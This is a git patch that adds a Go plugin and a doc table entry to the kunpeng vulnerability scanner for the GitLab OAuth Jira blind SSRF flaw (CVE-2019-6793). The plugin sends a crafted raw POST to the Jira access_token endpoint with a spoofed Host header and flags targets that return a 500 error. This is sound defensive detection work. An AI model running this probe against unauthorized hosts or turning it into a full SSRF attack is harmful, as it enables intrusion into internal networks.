From 98215520c738030c9a2e06d8f8e29673d6f8dbee Mon Sep 17 00:00:00 2001
From: wolf <wolf_cn@outlook.com>
Date: Wed, 20 Mar 2019 21:44:23 +0800
Subject: [PATCH] =?UTF-8?q?=E5=A2=9E=E5=8A=A0=20Gitlab=20OAuth=20Jira=20bl?=
 =?UTF-8?q?ind=20SSRF=E6=BC=8F=E6=B4=9E=E6=A3=80=E6=B5=8B=E6=8F=92?=
 =?UTF-8?q?=E4=BB=B6=20CVE-2019-6793?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 doc/plugin.md                |  1 +
 plugin/go/gitlabOAuthSSRF.go | 54 ++++++++++++++++++++++++++++++++++++
 2 files changed, 55 insertions(+)
 create mode 100644 plugin/go/gitlabOAuthSSRF.go

diff --git a/doc/plugin.md b/doc/plugin.md
index d184db35..f3e50759 100644
--- a/doc/plugin.md
+++ b/doc/plugin.md
@@ -85,6 +85,7 @@
 | KP-0079 | ThinkPHP5 5.0.23 远程代码执行 | thinkphp |  |[vulhub](https://github.com/vulhub/vulhub/tree/master/thinkphp/5.0.23-rce)|
 | KP-0080 | Apache Solr ConfigAPI 远程代码执行 | solr | CVE-2019-0192 ||
 | KP-0081 | Ruby on Rails 任意文件读取漏洞 | rails | CVE-2019-5418 |[vulhub](https://github.com/vulhub/vulhub/tree/master/rails/CVE-2019-5418)|
+| KP-0082 | Gitlab OAuth Jira blind SSRF | gitlab | CVE-2019-6793 ||
 
 
 
diff --git a/plugin/go/gitlabOAuthSSRF.go b/plugin/go/gitlabOAuthSSRF.go
new file mode 100644
index 00000000..1b70466a
--- /dev/null
+++ b/plugin/go/gitlabOAuthSSRF.go
@@ -0,0 +1,54 @@
+package goplugin
+
+import (
+	"net/url"
+	"strings"
+
+	"github.com/opensec-cn/kunpeng/plugin"
+	"github.com/opensec-cn/kunpeng/util"
+)
+
+type gitlabOAuthSSRF struct {
+	info   plugin.Plugin
+	result []plugin.Plugin
+}
+
+func init() {
+	plugin.Regist("gitlab", &gitlabOAuthSSRF{})
+}
+func (d *gitlabOAuthSSRF) Init() plugin.Plugin {
+	d.info = plugin.Plugin{
+		Name:    "Gitlab OAuth Jira blind SSRF",
+		Remarks: "Oauth :: Jira :: AuthorizationsController＃access_token端点容易受到blind SSRF漏洞的攻击。 该漏洞允许攻击者在GitLab实例的网络中发出任意HTTP / HTTPS请求。",
+		Level:   2,
+		Type:    "SSRF",
+		Author:  "wolf",
+		References: plugin.References{
+			URL:  "https://hackerone.com/reports/398799",
+			CVE:  "CVE-2019-6793",
+			KPID: "KP-0082",
+		},
+	}
+	return d.info
+}
+func (d *gitlabOAuthSSRF) GetResult() []plugin.Plugin {
+	var result = d.result
+	d.result = []plugin.Plugin{}
+	return result
+}
+func (d *gitlabOAuthSSRF) Check(URL string, meta plugin.TaskMeta) bool {
+	requestStr := "POST /-/jira/login/oauth/access_token HTTP/1.1\r\nHost: 8.8.8.8:88\r\nConnection: close\r\n\r\n"
+	u, err := url.Parse(URL)
+	if err != nil {
+		return false
+	}
+	buf, err := util.TCPSend(u.Host, []byte(requestStr))
+	if err == nil && (strings.Contains(string(buf), "<title>Something went wrong (500)</title>")) {
+		result := d.info
+		result.Response = string(buf)
+		result.Request = requestStr
+		d.result = append(d.result, result)
+		return true
+	}
+	return false
+}